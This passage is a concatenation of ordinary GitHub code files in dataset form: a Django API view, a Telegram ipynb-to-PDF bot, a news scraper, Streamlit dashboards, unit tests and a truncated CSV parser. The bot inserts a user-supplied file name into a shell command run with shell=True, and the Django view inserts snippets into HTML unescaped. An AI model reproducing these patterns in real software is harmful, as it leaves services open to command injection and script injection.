MEUsage.objects.all()\n serializer_class = MEUsageSerializer\n permission_classes = [permissions.IsAuthenticated, permissions.IsAdminUser]\n\n\nclass ScaffoldingAPIView(APIView):\n permission_classes = [permissions.IsAuthenticated, permissions.IsAdminUser]\n\n @extend_schema(\n parameters=[\n OpenApiParameter(name='ontology_term',\n description='A term to return links for',\n type=str,\n examples=[\n OpenApiExample('\\'metre\\''),\n OpenApiExample('\\'second\\'')\n ]),\n OpenApiParameter(name='distinction_ontology_term',\n required=False,\n description='An optional term to return distinction links with the required term for',\n type=str,\n examples=[\n OpenApiExample('\\'centimetre\\''),\n OpenApiExample('\\'millisecond\\'')\n ]),\n OpenApiParameter(name='link_type',\n required=False,\n description='Required type of link between ontology and material element. '\n 'Must by one of [\"any\", \"definition\", \"example\", \"distinction\", \"other\"]. '\n 'Default is \"any\"',\n type=str),\n OpenApiParameter(name='number_of_responses',\n required=False,\n description='Number of material elements to return. '\n 'Must be non-negative. If 0, all the links are returned. Default is 1',\n type=int),\n ],\n request=ScaffoldingRequestSerializer\n )\n def post(self, request, format=None):\n serializer = ScaffoldingRequestSerializer(data=request.data)\n if not serializer.is_valid():\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n data = serializer.validated_data\n if 'link_type' in data and data['link_type'] == 'distinction':\n if 'distinction_ontology_term' not in data:\n return Response('Error: distinction_ontology_term is required when link_type is distinction',\n status=status.HTTP_400_BAD_REQUEST)\n relevant_material_elements = \\\n MaterialElement.objects.filter(\n ontology_term=data['ontology_term']).filter(\n distinction_ontology_term=data['distinction_ontology_term'])\n relevant_classified_occurrences = ClassifiedOccurrence.objects.filter(\n occurrence__ontology_term__term=data['ontology_term']).filter(\n distinction_ontology_term=data['distinction_ontology_term']).filter(\n is_approved=True).order_by('relevance')\n else:\n relevant_material_elements = MaterialElement.objects.filter(\n ontology_term=data['ontology_term'])\n relevant_classified_occurrences = ClassifiedOccurrence.objects.filter(\n occurrence__ontology_term__term=data['ontology_term']).filter(\n is_approved=True).order_by('relevance')\n if 'link_type' in data and data['link_type'] != 'any':\n relevant_material_elements = relevant_material_elements.filter(\n material_element_type=data['link_type'])\n relevant_classified_occurrences = relevant_classified_occurrences.filter(\n occurrence_type=data['link_type']).filter(is_approved=True).order_by('relevance')\n contents = []\n if 'number_of_responses' not in data:\n len_contents = min(1, len(relevant_material_elements) + len(relevant_classified_occurrences))\n elif data['number_of_responses'] == 0:\n len_contents = len(relevant_material_elements) + len(relevant_classified_occurrences)\n else:\n len_contents = min(data['number_of_responses'],\n len(relevant_material_elements) + len(relevant_classified_occurrences))\n for i in range(0, len_contents):\n if i < len(relevant_material_elements):\n contents.append(create_html_snippet(relevant_material_elements[i].ontology_term,\n relevant_material_elements[i].content))\n MEUsage.objects.create(material_element=relevant_material_elements[i], usage_time=datetime.now())\n else:\n j = i - len(relevant_material_elements)\n contents.append(create_html_snippet(relevant_classified_occurrences[j].occurrence.ontology_term.term,\n relevant_classified_occurrences[j].snippet))\n COUsage.objects.create(classified_occurrence=relevant_classified_occurrences[j],\n usage_time=datetime.now())\n\n return Response(contents)\n\n\ndef create_html_snippet(term, snippet):\n with open('./static/scaffolding_response.html', 'r') as f:\n file_text = f.read()\n return file_text.replace('{{ term }}', term).replace('{{ snippet }}', snippet)\n","repo_name":"Nikita-A-Tatarinov/ITS_materials","sub_path":"db_materials/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5973,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"20828349239","text":"from telegram.ext import Updater, MessageHandler, Filters, CommandHandler\nimport subprocess\nimport telegram\nimport json\nimport os\nimport re\nimport logging\nimport platform\nimport emoji\nfrom utils import BotLogs\n\n# Enable logging\nlogging.basicConfig(format='%(asctime)s - %(name)s - %(levelname)s - \\\n %(message)s', level=logging.INFO)\nlogger = logging.getLogger(__name__)\nlogger.setLevel(logging.DEBUG)\n\n\nDATA_FOLDER = \"data\"\nPROXY_URL = None\nif platform.system() == 'Darwin':\n PROXY_URL = 'socks5://127.0.0.1:9050'\nelif platform.system() == 'Linux':\n PROXY_URL = 'socks5h://127.0.0.1:9050'\n\n# botlogger = BotLogs(\"bot_logger\", \"bot.log\")\n\nhelp_text = list()\nhelp_text.append(\"Этот бот позволяет конвертировать *.ipynb* в *.pdf* -- просто пришл�� мне *.ipynb* файл\")\nhelp_text.append('')\nhelp_text.append(\"Команда /files выводит список файлов в твоей директории и позволяет скачать нужный файл\")\nhelp_text = '\\n'.join(help_text)\n\nstart_text = list()\nstart_text.append(\"Привет!\")\nstart_text.append(help_text)\nstart_text.append('')\nstart_text.append(\"Возможно, тебе также будет интересно подписаться на канал @akarazeevchannel\")\nstart_text.append(emoji.emojize(\"Если возникнут трудности/будут пожелания или замечания, то направляй их пожалуйста @akarazeev :relieved:\", use_aliases=True))\nstart_text = '\\n'.join(start_text)\n\nbrackets_text = \"Убери скобочки из названия файла, пожалуйста. И пришли заново\"\nemptyfolder_text = \"Файлы отсутствуют. Пришли мне что-нибудь\"\n\n\ndef get_token():\n with open(\"token.json\") as jsn:\n data = json.load(jsn)\n return data[\"token\"]\n\n\ndef converter(bot, update):\n # global botlogger\n file_path = None\n\n chat_dir = os.path.join(DATA_FOLDER, str(update.message.chat_id))\n\n if not os.path.exists(chat_dir):\n os.mkdir(chat_dir)\n\n if update.message.document is not None:\n # Document case.\n file_name = update.message.document.file_name\n\n if re.compile(r'[\\(\\)\\[\\]]').search(file_name):\n update.message.reply_text(brackets_text)\n return\n\n if file_name[-6:].lower() != \".ipynb\":\n update.message.reply_text(help_text)\n return\n\n file = bot.get_file(update.message.document.file_id)\n file_path = os.path.join(chat_dir, file_name)\n file.download(file_path)\n else:\n update.message.reply_text(\"Error\")\n return\n\n file_path = os.path.realpath(file_path)\n\n users_number = len(os.listdir('data/'))\n\n update.message.reply_text(f\"Конвертирую...\\nПока ты ждёшь -- можешь почитать @akarazeevchannel :)\\n\\nСтатистика показывает, что примерное число активных пользователей: *{users_number}*\", parse_mode=telegram.ParseMode.MARKDOWN)\n print(file_path)\n # bash_command = \"source /home/anton/.envs/ipy/bin/activate && cd /home/anton/WD/ipy2pdf/ && python3 ipy2pdf '{}'\".format(file_path)\n bash_command = \"cd /home/anton/WD/ipy2pdf/ && python3 ipy2pdf '{}'\".format(file_path)\n print(bash_command)\n process = subprocess.Popen(bash_command, stdout=subprocess.PIPE, shell=True)\n process.communicate()\n print(\"Converted!\")\n\n pdf_path = file_path.replace(\".ipynb\", \".pdf\")\n\n with open(pdf_path, 'rb') as f:\n update.message.reply_document(f)\n\n # botlogger.add_msg(\"user {} send {}\".format(str(update.message.chat_id), file_name))\n\n # update.message.reply_text(make_info())\n\n\n# def make_info():\n# global botlogger\n# reqs = str(botlogger.number_of_requests())\n# firstdate = botlogger.first_date()\n# msg = '{} requests since launch ({})'.format(reqs, firstdate)\n# return msg\n\n\n# def info(bot, update):\n# msg = make_info()\n# update.message.reply_text(msg)\n\n\ndef get_chat_dir(chat_id):\n return os.path.join(DATA_FOLDER, str(chat_id))\n\n\ndef get_files_list(chat_dir):\n \"\"\"Short summary.\n\n Args:\n chat_dir (str): Path to user's folder.\n\n Returns:\n list: List of pairs (number, filename)\n\n \"\"\"\n print(chat_dir)\n chat_dir_list = os.listdir(chat_dir)\n chat_dir_list = sorted(list(filter(lambda x: not x.startswith('.'), chat_dir_list)))\n chat_dir_list = list(enumerate(chat_dir_list))\n return chat_dir_list\n\n\ndef files(bot, update):\n chat_dir = get_chat_dir(update.message.chat_id)\n\n try:\n if not os.path.exists(chat_dir):\n raise Exception\n\n chat_dir_list = get_files_list(chat_dir)\n\n if len(chat_dir_list) == 0:\n raise Exception\n\n response_text = list()\n response_text.append(\"Содержимое твоей папки:\")\n for number, filename in chat_dir_list:\n response_text.append(f'- *{filename}* --скачать--> /{number}')\n response_text = '\\n'.join(response_text)\n update.message.reply_text(response_text, parse_mode=telegram.ParseMode.MARKDOWN)\n except Exception as e:\n update.message.reply_text(emptyfolder_text)\n\n\ndef choose_file(bot, update):\n command = update.message.text\n chat_id = update.message.chat_id\n\n file_number = int(command[1:])\n chat_dir = get_chat_dir(chat_id)\n chat_dir_list = get_files_list(chat_dir)\n filename = chat_dir_list[file_number][1]\n\n update.message.reply_text(f'Ты просишь меня скачать файл *{filename}*, который имеет порядков��й номер *{file_number}* в директории. Окей...', parse_mode=telegram.ParseMode.MARKDOWN)\n with open(os.path.join(get_chat_dir(chat_id), filename), 'rb') as f:\n update.message.reply_document(f)\n\n\ndef info(bot, update):\n users_number = len(os.listdir('data/'))\n update.message.reply_text(f\"Конвертирую...\\nПока ты ждёшь -- можешь почитать @akarazeevchannel :)\\n\\nСтатистика показывает, что пример ное число активных пользователей: *{users_number}*\", parse_mode=telegram.ParseMode.MARKDOWN)\n\n\ndef help(bot, update):\n update.message.reply_text(help_text, parse_mode=telegram.ParseMode.MARKDOWN)\n\n\ndef start(bot, update):\n update.message.reply_text(start_text, parse_mode=telegram.ParseMode.MARKDOWN)\n\n\ndef main():\n token = get_token()\n print('-> USE PROXY')\n req = telegram.utils.request.Request(proxy_url=PROXY_URL,\n read_timeout=30, connect_timeout=20,\n con_pool_size=10)\n bot = telegram.Bot(token=token, request=req)\n\n updater = Updater(bot=bot)\n dp = updater.dispatcher\n\n # on noncommand i.e message - echo the message on Telegram\n dp.add_handler(CommandHandler(\"files\", files))\n dp.add_handler(CommandHandler(\"info\", info))\n dp.add_handler(CommandHandler(\"help\", help))\n dp.add_handler(CommandHandler(\"start\", start))\n dp.add_handler(MessageHandler(Filters.text, help))\n dp.add_handler(MessageHandler(Filters.document, converter))\n dp.add_handler(MessageHandler(Filters.command, choose_file))\n\n updater.start_polling()\n updater.idle()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"akarazeevprojects/ipy2pdf","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":7491,"program_lang":"python","lang":"ru","doc_type":"code","stars":19,"dataset":"github-code","pt":"77"} +{"seq_id":"42392987027","text":"import requests\nfrom bs4 import BeautifulSoup\nimport csv\n\nresponse = requests.get('https://g1.globo.com/')\ndata = response.content\n\n\"\"\"Pegando conteudo de uma pagina com o request e avisando ao BeautifulSoup que \nEsse elemento é do tipo HTML com o 'html.parser' logo abaixo\n\"\"\"\n\nsite = BeautifulSoup(data, 'html.parser')\nnews = site.findAll('div', attrs={'class': 'feed-post-body'})\n\n\"\"\"O comando FindAll() gera um tipo de lista que pode ser iterável\n\"\"\"\n\n\nwith open('noticias.csv', 'a', newline=\"\") as arquivo:\n \"\"\"abrindo primeiro em modo escrita\n \"\"\"\n with open('noticias.csv') as aqr:\n \"\"\"abrindo em modo leitura\n \"\"\"\n escrevendo = csv.DictWriter(\n arquivo, fieldnames=['Titulo', 'Subtitulo', 'Link'])\n if len(aqr.read()) == 0:\n \"\"\"verificando se o arquivo.csv está vazio. Se estiver adicionamos o writeheader() para escrever o cabeçalho\n \"\"\"\n escrevendo.writeheader()\n for new in news:\n title = new.find(\n 'a', attrs={'class': 'feed-post-link gui-color-primary gui-color-hover'})\n subtitle = new.find('a', attrs={\n 'class': 'gui-color-primary gui-color-hover feed-post-body-title bstn-relatedtext'})\n if subtitle:\n \"\"\"\n verifica se o subtitulo da noticia existe\n \"\"\"\n escrevendo.writerow(\n {'Titulo': title.text, 'Subtitulo': subtitle.text, 'Link': title['href']})\n else:\n escrevendo.writerow(\n {'Titulo': title.text, 'Subtitulo': 'Sem subtitulo', 'Link': title['href']})\n","repo_name":"w1llx1m/modulo_git","sub_path":"data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":1656,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"6527981103","text":"import pandas as pd\nimport datetime\nimport streamlit as st\nimport plotly.graph_objects as go\nimport time\nimport dashboard_features as dbf\n\nst.set_page_config(\n page_title=\"Investor Dashboard\",\n page_icon=\"📈\",\n layout=\"wide\"\n)\n\n# Read in portfolio data\nportfolio_df = pd.read_excel(\"./portfolio_example.xlsx\")\n\n# Header\nst.write(\"# Portfolio Overview\")\nst.write(\"Current performance of your investment portfolio...\")\nst.write(\"\")\nst.write(\"\")\n\nst.sidebar.write(\"Feature below is under construction.\")\n# Sidebar for stock transaction\nbuysell_stock = st.sidebar.selectbox(\n \"Select stock to buy or sell.\",\n (\"TSLA\",\"AAPL\",\"MSFT\",\"AMZN\",\"JNJ\")\n)\n\n# Quantity input\namount = st.sidebar.number_input(\"Quantity\", min_value=0)\n\n#Buy or Sell w/ transact button\nbuysell = st.sidebar.selectbox(\"Would you like to buy or sell?\", (\"Buy\", \"Sell\"))\nif st.sidebar.button(\"Transact\"):\n\n if buysell_stock == \"TSLA\":\n buysell_stock = 0\n elif buysell_stock == \"AAPL\":\n buysell_stock = 1\n elif buysell_stock == \"MSFT\":\n buysell_stock = 2\n elif buysell_stock == \"AMZN\":\n buysell_stock = 3\n else: #buysell_stock == \"JNJ\":\n buysell_stock = 4\n\n if buysell == \"Buy\":\n #can add check balance feature\n #dbf.buy_stock(amount, buysell_stock, portfolio_df)\n st.sidebar.success(\"Transaction confirmed!\", icon = \"✅\") \n elif buysell == \"Sell\" and amount <= portfolio_df.at[buysell_stock, 'QUANTITY']:\n #dbf.sell_stock(amount, buysell_stock, portfolio_df)\n st.sidebar.success(\"Transaction confirmed!\", icon = \"✅\")\n elif buysell == \"Sell\" and amount >= portfolio_df.at[buysell_stock, 'QUANTITY']:\n st.sidebar.write(\"Transaction canceled.\")\n st.sidebar.write(\" Warning: You do not have enough stocks to sell, you may only input value at or below total stock. \")\n\n\n\n\n\n# Live dashboard\nplaceholder = st.empty()\n\nfor seconds in range(100):\n\n # Update ticker price & info in df (DASHBOARD FEATURES)\n dbf.update_df(portfolio_df)\n unrealized_pl = portfolio_df['UNREALIZED P&L'].sum()\n current_pf_value = portfolio_df['CURRENT VALUE'].sum()\n \n\n with placeholder.container():\n\n fig_col1, fig_col2, fig_col3, fig_col4, fig_col5 = st.columns([5.5,0.25,1,0.25,1], gap='small')\n #col2 and col4 acts as placeholders/spacers for adjacent columns\n \n # Nested Pie Chart\n with fig_col1:\n st.write(dbf.fig1(portfolio_df))\n\n #Total Asset Performance Indicator\n with fig_col3:\n st.metric(\n label=\"Total Assets\", \n value = round(current_pf_value, 2),\n delta = str(round(unrealized_pl, 2))\n )\n\n #Daily Stock Performance Indicator\n with fig_col5:\n st.metric(\n label=\"TSLA (Daily)\", \n value = round(portfolio_df.at[0,'CURRENT PRICE'], 2),\n delta = round(portfolio_df.at[0,'CURRENT PRICE'] - dbf.prev_close('TSLA'), 2)\n )\n\n st.metric(\n label=\"AAPL (Daily)\", \n value = round(portfolio_df.at[1,'CURRENT PRICE'], 2),\n delta = round(portfolio_df.at[1,'CURRENT PRICE'] - dbf.prev_close('AAPL'), 2)\n )\n st.metric(\n label=\"MSFT (Daily)\", \n value = round(portfolio_df.at[2,'CURRENT PRICE'], 2),\n delta = round(portfolio_df.at[2,'CURRENT PRICE'] - dbf.prev_close('MSFT'), 2)\n )\n st.metric(\n label=\"AMZN (Daily)\", \n value = round(portfolio_df.at[3,'CURRENT PRICE'], 2),\n delta =round(portfolio_df.at[3,'CURRENT PRICE'] - dbf.prev_close('AMZN'), 2)\n )\n st.metric(\n label=\"JNJ (Daily)\", \n value = round(portfolio_df.at[4,'CURRENT PRICE'], 2),\n delta = round(portfolio_df.at[4,'CURRENT PRICE'] - dbf.prev_close('JNJ'), 2)\n )\n\n st.write(\"\") \n\n st.dataframe(portfolio_df)\n\n st.write(\"### Portfolio Performance\")\n st.write(dbf.fig2(dbf.pf_performance(portfolio_df)))\n st.dataframe(dbf.pf_performance(portfolio_df))\n \n\n time.sleep(5)","repo_name":"kvpcrypto/InvestorDashboard","sub_path":"Portfolio.py","file_name":"Portfolio.py","file_ext":"py","file_size_in_byte":4233,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"38126856914","text":"import os\nimport unittest\nimport pandas as pd\nfrom ..main import CarDataNormalizer, CarDataReporter\n\n\nclass CarDataNormalizerTest(unittest.TestCase):\n\n def setUp(self) -> None:\n self.normalizer = CarDataNormalizer(\"adastra_cars_task/tests/test_cars.json\")\n\n def test_fill_miles_per_gallon_missing_values(self):\n # there are 6 other missing values in a different column\n expected_missing_values_in_dataframe = 6\n self.normalizer._CarDataNormalizer__fill_miles_per_gallon_missing_values()\n self.assertEqual(expected_missing_values_in_dataframe, self.normalizer.cars_dataframe.isnull().values.sum())\n\n def test_fill_horsepower_missing_values(self):\n expected_missing_values_in_dataframe = 8\n self.normalizer._CarDataNormalizer__fill_horsepower_missing_values()\n self.assertEqual(expected_missing_values_in_dataframe, self.normalizer.cars_dataframe.isnull().values.sum())\n\n def test_convert_date_string_to_date_type(self):\n self.normalizer._CarDataNormalizer__convert_date_string_to_date_type()\n self.assertEqual(\"datetime64[ns]\", self.normalizer.cars_dataframe[\"Year\"].dtype)\n\n def test_get_normalized_dataframe(self):\n final_dataframe = self.normalizer.get_normalized_dataframe()\n self.assertEqual(0, final_dataframe.isnull().values.sum())\n self.assertEqual(\"datetime64[ns]\", self.normalizer.cars_dataframe[\"Year\"].dtype)\n\n\nclass CarDataReporterTest(unittest.TestCase):\n\n def test_get_number_of_unique_cars(self):\n test_dict = {'Name': ['Car A', 'Car B', 'Car A', 'Car C', 'Car B']}\n test_dataframe = pd.DataFrame(test_dict)\n tested_class = CarDataReporter(test_dataframe)\n expected_result = \"There is a total of 3 unique cars in the dataset.\"\n self.assertEqual(expected_result, tested_class._CarDataReporter__get_number_of_unique_cars())\n\n\n def test_calculate_average_horse_power(self):\n test_dict = {'Horsepower': [110, 120, 150, 190, 400, 200, 90]}\n test_dataframe = pd.DataFrame(test_dict)\n tested_class = CarDataReporter(test_dataframe)\n expected_result = \"The average horsepower of the cars in the dataset is 180.0.\"\n self.assertEqual(expected_result, tested_class._CarDataReporter__calculate_average_horse_power())\n\n def test_determine_heaviest_cars(self):\n test_dict = {\n 'Name': ['Car A', 'Car B', 'Car C', 'Car D', 'Car E', 'Car F', 'Car G'],\n 'Weight_in_lbs': [4000, 3500, 4500, 3800, 5000, 5500, 2500]\n }\n test_dataframe = pd.DataFrame(test_dict)\n tested_class = CarDataReporter(test_dataframe)\n expected_result = \"These 5 cars are the heaviest in the dataset:\\n\" \\\n \"5 Car F\\n\" \\\n \"4 Car E\\n\" \\\n \"2 Car C\\n\" \\\n \"0 Car A\\n\" \\\n \"3 Car D\"\n self.assertEqual(expected_result, tested_class._CarDataReporter__determine_heaviest_cars())\n\n def test_get_number_of_cars_made_by_each_manufacturer(self):\n data = {\n 'Name': ['Toyota Camry', 'Ford Focus', 'Toyota Corolla', 'Honda Accord', 'Ford Mustang'],\n }\n test_dataframe = pd.DataFrame(data)\n tested_class = CarDataReporter(test_dataframe)\n expected_result = \"This is how many cars have been made by each manufacturer:\\n\" \\\n \"Manufacturer\\n\" \\\n \"Toyota 2\\n\" \\\n \"Ford 2\\n\" \\\n \"Honda 1\"\n self.assertEqual(expected_result, tested_class._CarDataReporter__get_number_of_cars_made_by_each_manufacturer())\n\n def test_get_number_of_cars_made_each_year(self):\n data = {\n 'Name': ['Toyota Camry', 'Ford Focus', 'Toyota Corolla'],\n 'Year': ['2020-01-01', '2020-01-01', '2021-01-01']\n }\n df = pd.DataFrame(data)\n df['Year'] = pd.to_datetime(df[\"Year\"], format=\"%Y-%m-%d\")\n data_reader = CarDataReporter(df)\n cars_by_year = data_reader._CarDataReporter__get_number_of_cars_made_each_year()\n expected_result = \"This is how many cars are made each year:\\n\\r\" \\\n \"Year\\n\" \\\n \"2020 2\\n\" \\\n \"2021 1\"\n self.assertEqual(cars_by_year, expected_result)\n\n def test_save_dataframe_to_csv(self):\n data = {\n 'Name': ['Toyota Camry', 'Ford Focus', 'Toyota Corolla'],\n 'Year': ['2020-01-01', '2020-01-01', '2021-01-01']\n }\n df = pd.DataFrame(data)\n data_reader = CarDataReporter(df)\n result = data_reader._CarDataReporter__save_dataframe_to_csv()\n expected_result = \"The data has been saved in cars.csv\"\n self.assertEqual(result, expected_result)\n self.assertTrue(os.path.exists(\"cars.csv\"))\n # os.remove(\"cars.csv\")\n\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"bisera-ivanova/adastra_cars_task","sub_path":"tests/test_main.py","file_name":"test_main.py","file_ext":"py","file_size_in_byte":4999,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"16609218676","text":"import unittest\n\nfrom aops_check.core.experiment.algorithm.multi_item_check.statistical_multi_item_check import StatisticalCheck\n\n\nclass TestStatisticalMultiItemCheckTestCase(unittest.TestCase):\n \"\"\"\n test statistical multi-item check algo\n \"\"\"\n def test_calculate_should_return_true_when_error_rate_acceptable(self):\n algorithm = StatisticalCheck(1)\n data = [{\"metric_name\": \"scrape_duration_seconds\", \"metric_label\": {}},\n {\"metric_name\": \"scrape_samples_scraped\", \"metric_label\": {}}]\n res = algorithm.calculate(data)\n self.assertEqual(res, False)\n\n def test_calculate_should_return_false_when_error_rate_unacceptable(self):\n algorithm = StatisticalCheck(0.5)\n data = [{\"metric_name\": \"scrape_duration_seconds\", \"metric_label\": {}},\n {\"metric_name\": \"scrape_samples_scraped\", \"metric_label\": {}}]\n res = algorithm.calculate(data)\n self.assertEqual(res, True)\n","repo_name":"openeuler-mirror/A-Ops","sub_path":"aops-check/aops_check/tests/core/experiment/algorithm/multi_item_check/test_statistical_multi_item_check.py","file_name":"test_statistical_multi_item_check.py","file_ext":"py","file_size_in_byte":963,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"77"} +{"seq_id":"30174929086","text":"import streamlit as st\n\nst.set_page_config(\n page_title=\"Decision Trees - Beginner Machine Learning\",\n page_icon=\"🤖\",\n)\nst.header(\"Decision Trees Demo 🌲\", \"nlp\")\n\nst.write(\n \"\"\"Use (GBDT) Gradient Boosted Decision Trees to 'classify' a set of 'feature' inputs with a certain output 'label'.\nThe 'HistGradientBoostingClassifier' model attempts to learn how input features relate to output labels with randomized Decision Trees.\nThe implementation in [scikit-learn](https://scikit-learn.org/stable/modules/ensemble.html#histogram-based-gradient-boosting) utilizes elements from LightGBM and XGBoost.\n\nThis Example:\n\n- Use Penguin 'features' such as Bill Length and Body Mass\n- 'label' a set of observed features with the most likely Penguin species\n- Train the 'Classifier' model on a set of real observations from [Palmer Station](https://allisonhorst.github.io/palmerpenguins/) in Antarctica!\n\nOther awesome app features:\n- Downloading Models\n- Multi-field input forms\n\nPowered by [Scikit-Learn](https://scikit-learn.org/stable/index.html) and [Streamlit](https://docs.streamlit.io/).\nBuilt with ❤️ by [Gar's Bar](https://tech.gerardbentley.com/)\n\"\"\"\n)\n\nimport pickle\n\nimport matplotlib.pyplot as plt\nimport pandas as pd\nfrom sklearn.ensemble import HistGradientBoostingClassifier\nfrom sklearn.inspection import permutation_importance\nfrom sklearn.model_selection import cross_validate, train_test_split\nfrom sklearn.preprocessing import LabelEncoder\nfrom sklearn.metrics import accuracy_score\n\n\ndef render_end():\n st.write(\n \"\"\"## Take it further:\n\n- Compare results to simpler tabular models (Regression, Random Forest) or other Gradient Boosting implementations (XGBoost, LightGBM, CatBoost)\n- Perform a 'regression' task instead of 'classification' to get a pseudo-confidence score from the model\n- Utilize Cross-Validation with Quantile Losses or Mean losses to assess confidence intervals\n- Explore tabular models in other use cases such as Time Series analysis\n \"\"\"\n )\n\n if st.checkbox(\"Show Code (~200 lines)\"):\n with open(__file__, \"r\") as f:\n st.code(f.read())\n st.stop()\n\n\n@st.experimental_memo\ndef run_training(features, labels):\n model = HistGradientBoostingClassifier(\n random_state=47, categorical_features=categorical_column_mask\n )\n features_train, features_test, labels_train, labels_test = train_test_split(\n features, labels, random_state=47\n )\n model.fit(features_train, labels_train)\n labels_predicted = model.predict(features_test)\n labels_predicted_train = model.predict(features_train)\n test_score = accuracy_score(labels_predicted, labels_test)\n train_score = accuracy_score(labels_predicted_train, labels_train)\n feature_importance = get_importances(model, features_train, labels_train)\n\n labels_predicted_display = species_encoder.inverse_transform(labels_predicted)\n labels_test_display = species_encoder.inverse_transform(labels_test)\n results = pd.DataFrame(\n {\n \"Predicted Species\": labels_predicted_display,\n \"Actual Species\": labels_test_display,\n **features_test[feature_cols],\n }\n )\n return model, results, feature_importance, train_score, test_score\n\n\ndef get_importances(model, features, labels):\n result = permutation_importance(\n model, features, labels, n_repeats=10, random_state=47\n )\n\n sorted_importances_idx = result.importances_mean.argsort()\n importances = pd.DataFrame(\n result.importances[sorted_importances_idx].T,\n columns=features.columns[sorted_importances_idx],\n )\n return importances\n\n\npenguin_df = pd.read_csv(\n \"data/penguins.csv\",\n dtype={\"species\": \"category\", \"island\": \"category\", \"sex\": \"category\"},\n)\npenguin_df = penguin_df.dropna()\n\nwith st.expander(\"Raw Data\"):\n penguin_df\n\nif st.checkbox(\"Show Feature Comparison\", True):\n x_label = st.selectbox(\n \"X Axis Feature\",\n penguin_df.columns,\n penguin_df.columns.get_loc(\"bill_length_mm\"),\n )\n y_label = st.selectbox(\n \"Y Axis Feature\",\n penguin_df.columns,\n penguin_df.columns.get_loc(\"bill_depth_mm\"),\n )\n fig, ax = plt.subplots()\n penguin_df.plot.scatter(x_label, y_label, c=\"species\", ax=ax, colormap=\"rainbow\")\n ax.set_title(f\"Scatter Plot Feature Comparison: {x_label} x {y_label}\")\n ax.axvline(x=0, color=\"k\", linestyle=\"--\")\n ax.axhline(y=0, color=\"k\", linestyle=\"--\")\n ax.figure.tight_layout()\n st.pyplot(fig)\n\nspecies_encoder = LabelEncoder()\nisland_encoder = LabelEncoder()\nsex_encoder = LabelEncoder()\n\nlabels = species_encoder.fit_transform(penguin_df[\"species\"])\nfeature_cols = [\n \"island\",\n \"bill_length_mm\",\n \"bill_depth_mm\",\n \"flipper_length_mm\",\n \"body_mass_g\",\n \"sex\",\n]\ncategorical_column_mask = [column in (\"island\", \"sex\") for column in feature_cols]\n\nfeatures = penguin_df[feature_cols]\nfeatures[\"island\"] = island_encoder.fit_transform(penguin_df[\"island\"])\nfeatures[\"sex\"] = sex_encoder.fit_transform(penguin_df[\"sex\"])\n\n\nif not st.checkbox(\"Press Here to Train Model on 75% of the data\"):\n render_end()\n\nmodel, results, feature_importance, train_score, test_score = run_training(\n features, labels\n)\nwith st.expander(\"Missed Predictions\"):\n results[results[\"Predicted Species\"] != results[\"Actual Species\"]]\n\nif st.checkbox(\"Show Feature Importance\", key=\"feat_importance\"):\n fig, ax = plt.subplots()\n feature_importance.plot.box(vert=False, whis=10, ax=ax)\n ax.set_title(\"Permutation Importances\")\n ax.axvline(x=0, color=\"k\", linestyle=\"--\")\n ax.set_xlabel(\"Decrease in accuracy score\")\n ax.figure.tight_layout()\n st.pyplot(fig)\n\nst.download_button(\n f\"Download Trained Model\",\n pickle.dumps(model),\n help=\"Download the model weights to be used for future predictions\",\n)\n\nst.header(\"Predict your own Penguin's species 🐧\")\n\nwith st.form(\"user_inputs\"):\n island = st.selectbox(\"Penguin Island\", options=list(penguin_df[\"island\"].unique()))\n sex = st.selectbox(\"Sex\", options=list(penguin_df[\"sex\"].unique()))\n bill_length = st.number_input(\"Bill Length (mm)\", min_value=0)\n bill_depth = st.number_input(\"Bill Depth (mm)\", min_value=0)\n flipper_length = st.number_input(\"Flipper Length (mm)\", min_value=0)\n body_mass = st.number_input(\"Body Mass (g)\", min_value=0)\n is_submitted = st.form_submit_button()\n\nif not is_submitted:\n st.info(\"Hit 'Submit' to predict your Penguin's species\")\nelse:\n feature_input = {\n \"island\": island,\n \"bill_length\": bill_length,\n \"bill_depth\": bill_depth,\n \"flipper_length\": flipper_length,\n \"body_mass\": body_mass,\n \"sex\": sex,\n }\n st.json(feature_input)\n feature_input[\"island\"] = island_encoder.transform([island])[0]\n feature_input[\"sex\"] = sex_encoder.transform([sex])[0]\n with st.expander(\"Show Transformed User Input\"):\n feature_input\n prediction = model.predict([[*feature_input.values()]])\n with st.expander(\"Raw Prediction\"):\n prediction[0]\n (species,) = species_encoder.inverse_transform([prediction])\n st.success(f\"Most likely an **{species}** Penguin!\")\n\nrender_end()\n","repo_name":"gerardrbentley/Beginner-ML-Projects","sub_path":"pages/04_Decision_Trees.py","file_name":"04_Decision_Trees.py","file_ext":"py","file_size_in_byte":7206,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"26180093412","text":"from copy import deepcopy\nimport csv\n\ndef parseTrackLayout(path, size=15):\n\n REQUIRED_FIELDS = ['Line', 'Section', 'Block Number', 'Infrastructure']\n numBlocksPerController = size\n\n controller = {\n \"block-occupancy\" : [],\n \"switch-state\" : [],\n \"crossing-state\" : [],\n \"total-blocks\" : 0\n }\n\n CONTROLLERS = []\n TOTAL_BLOCKS = 0\n\n with open(path, mode='r') as file:\n ## Read Header\n getRank = csv.DictReader(file)\n if size == 0:\n numBlocksPerController = sum(1 for row in getRank)\n\n ## Return to the top of the file - is there a better solution?\n file.seek(0)\n track_layout = csv.DictReader(file)\n\n ## Check for required headers\n for header in REQUIRED_FIELDS:\n if header not in track_layout.fieldnames:\n print(f\"{header} not found in file...\")\n print('exiting')\n exit(1)\n\n ## Populate data in to line\n for row in track_layout:\n\n TOTAL_BLOCKS += 1\n ## Adding a new controller\n\n ## Increment the number of blocks assigned\n ## to that controller\n controller['total-blocks'] += 1\n\n ## populate block-occupancy\n controller['block-occupancy'].append((row['Block Number'], row['Section'], False))\n\n ## populate switch-state\n if row['Infrastructure'] != None and 